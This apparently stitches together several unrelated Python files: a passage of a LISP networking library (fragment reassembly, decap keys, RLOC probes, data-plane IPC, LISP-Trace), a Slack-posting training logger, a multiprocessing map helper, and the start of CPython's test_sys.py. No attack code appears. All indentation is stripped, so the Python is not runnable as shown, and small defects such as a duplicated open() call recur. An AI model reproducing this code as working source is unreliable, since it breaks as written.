ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
# Initialized list if first fragment. Indexed by IPv4 Ident.
#
if (lisp_reassembly_queue.has_key(ident) == False):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
# Do not queue fragment if first fragment arrived and we determined its
# not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
# If we did not return, we have all fragments. Now append them. Keep the
# IP header in the first fragment but remove in each other fragment.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<<port> or <addr>:0 in lisp_crypto_
# keys_by_rloc_decap{}.
#
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
addr_str = addr.print_address_no_iid()
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
#
# We are at non-NAT based xTR. We need to get the keys from an RTR
# or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (lisp_rloc_probe_list.has_key(addr)): return(addr)
#
# Have to check NAT cache to see if RLOC is translated. If not, this
# is an xTR in public space. We'll have to change this in the future
# so we don't do a full table traversal. But this only happensu
#
for nat_info in lisp_nat_state_info.values():
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
#endif
return(addr)
#endif
return(addr_and_port)
#enddef
#
# lisp_set_ttl
#
# Set send IP TTL for outgoing packet.
#
def lisp_set_ttl(lisp_socket, ttl):
try:
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
except:
lprint("socket.setsockopt(IP_TTL) not supported")
pass
#endtry
return
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return source address, source port, ttl, and position packet to the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9])[0] == 17)
if (udp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is a RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (commands.getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if (msg.has_key("entries") == False):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if (msg.has_key("eid-prefix") == False):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if (msg.has_key("instance-id") == False):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if (msg.has_key("rlocs") == False):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if (ipc_rloc.has_key("rloc") == False): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ipc_rloc.has_key("packet-count") == False else \
ipc_rloc["packet-count"]
bc = 0 if ipc_rloc.has_key("byte-count") == False else \
ipc_rloc["byte-count"]
ts = 0 if ipc_rloc.has_key("seconds-last-packet") == False else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If are an RTR, we can process the stats directly. If are an ITR we need
# to send an IPC message the the lisp-etr process.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
#
# Process stats counters in lisp-etr and lisp-rtr processes. Variable 'msg'
# is a dictionary array when the ITR/RTR is processing msg. When an ETR
# is processing it, it recevied a json string from the ITR so it needs
# to convert to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if msg.has_key(key_name) == False else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The format of the JSON
# messages are for types: "discovery", "restart", "statistics", and "decap-
# statistics". This function calls functions for the stats and restart types
# but this function processes logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
# And:
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if (msg.has_key("type") == False):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if (msg.has_key("interface") == False):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if (msg.has_key("source-eid")):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if (msg.has_key("dest-eid")):
dest_eid = msg["dest-eid"]
deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
if (interface != None and lisp_i_am_itr):
lisp_itr_discover_eid(db, seid, device, interface)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(seid, deid)): return
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
lisp_ipc_listen_socket):
eid_str = eid.print_address()
if (db.dynamic_eids.has_key(eid_str)):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
eid_string,input_interface, routed, dyn_eid.timeout))
#
# Tell ETR process so it can register dynamic-EID.
#
ipc = "learn%{}%{}".format(eid_str, routed_interface)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x.q to x.x.x.x. This is an expensive function. But it is hardly
# used. And once it is used for a particular addr_str, it shouldn't be used
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
# If crypto-keys the same, go to find next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
# Try ICV check. If works, then go to this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
#endif
return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if configured LISP-Decent modulus is not 0. Meaning we are using
# the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value.
#
def lisp_get_decent_index(eid):
eid_str = eid.print_prefix()
hash_value = hashlib.sha256(eid_str).hexdigest()
index = int(hash_value, 16) % lisp_decent_modulus
return(index)
#enddef
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# Supplied source and group are addresses passed as strings. Build in internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
rloc_entry=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
# Display port if in this call is a encapsulating RTR using a translated
# RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["node"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["srloc"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["node"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["srloc"] += ":{}".format(packet.inner_sport)
#endif
entry["hn"] = lisp_hostname
key = ed + "-ts"
entry[key] = lisp_get_timestamp()
#
# If this is a ETR decap entry and the drloc is "?", the packet came in on
# lisp_etr_nat_data_plane() where the kernel strips the outer header. Get
# the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["node"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
#endif
#endif
entry["drloc"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["drloc"] += " ({})".format(reason)
#endif
#
# Add recent-rtts and recent-hops.
#
if (rloc_entry != None):
entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
entry["hops"] = rloc_entry.recent_rloc_probe_hops
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["seid"] = seid
rec["deid"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
# Search for record. If we appending the first ITR node entry, get its
# RLOC address in case we have to return-to-sender.
#
for rec in trace.packet_json:
if (rec["deid"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
# If we are destination-EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and entry["node"] == "ETR" and
trace.myeid(packet.inner_dest)):
rec = {}
rec["seid"] = deid
rec["deid"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
# Print the JSON packet after we appended data to it. Put the new JSON in
# packet. Fix up lengths and checksums from inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
# Otherwise we are forwarding a packet that is about to encapsulated or we
# are forwarding a packet that was just decapsulated with the addresses
# swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["srloc"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
# Fix up UDP length and recompute UDP checksum if IPv6 packet, zero
# otherwise. Only do checksum when the Trace went round-trip and this is
# the local ETR delivery EID-based Trace packet to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["node"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
# If we are swampping addresses, do it here so the JSON append and IP
# header fields changes are all reflected in new IPv4 header checksum.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
#------------------------------------------------------------------------------
|
infolog.py
|
# -*- coding:utf-8 -*-
import atexit
import json
from datetime import datetime
from threading import Thread
from urllib.request import Request, urlopen
_format = '%Y-%m-%d %H:%M:%S.%f'
_file = None
_run_name = None
_slack_url = None
def init(filename, run_name, slack_url=None):
global _file, _run_name, _slack_url
_close_logfile()
_file = open(filename, 'a', encoding="utf-8")
_file = open(filename, 'a', encoding="utf-8")
_file.write('\n-----------------------------------------------------------------\n')
_file.write('Starting new {} training run\n'.format(run_name))
_file.write('-----------------------------------------------------------------\n')
_run_name = run_name
_slack_url = slack_url
def log(msg, end='\n', slack=False):
#print(msg, end=end)
if _file is not None:
_file.write('[%s] %s\n' % (datetime.now().strftime(_format)[:-3], msg))
if slack and _slack_url is not None:
Thread(target=_send_slack, args=(msg,)).start()
def _close_logfile():
global _file
if _file is not None:
_file.close()
_file = None
def _send_slack(msg):
req = Request(_slack_url)
req.add_header('Content-Type', 'application/json')
urlopen(req, json.dumps({
'username': 'tacotron',
'icon_emoji': ':taco:',
'text': '*%s*: %s' % (_run_name, msg)
}).encode())
atexit.register(_close_logfile)
|
mp.py
|
import sys
import marshal
import multiprocessing as mp
try:
import progressbar as pb
except ImportError:
pass
def map(func, iterable, procs = mp.cpu_count()):
input, output = mp.Queue(), mp.Queue()
length = mp.Value('i',0)
def _fill(iterable, procs, input, output):
for data in enumerate(iterable):
input.put(data)
length.value += 1
for _ in range(procs*2):
input.put((-1,-1))
def _func(proc, input, output):
idx, data = input.get()
while idx != -1:
output.put((idx, func(data)))
idx, data = input.get()
filler = mp.Process(target = _fill, args=(iterable, procs, input, output))
filler.daemon = True
filler.start()
for i in range(procs):
proc = mp.Process(target=_func, args=(i, input, output))
proc.daemon = True
proc.start()
try:
iterlen = len(iterable)
except:
filler.join()
iterlen = length.value
data = [[]]*iterlen
try:
progress = pb.ProgressBar(widgets=[pb.Percentage(), pb.Bar()], maxval=iterlen)
progress.start()
for i in range(iterlen):
idx, result = output.get()
data[idx] = result
progress.update(i+1)
progress.finish()
except NameError:
for _ in range(iterlen):
idx, result = output.get()
data[idx] = result
return data
if __name__ == "__main__":
#pool = Pool()
#data = pool.map(
map(lambda x: max(x), zip(*(iter(range(65536)),)*3))
|
test_sys.py
|
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
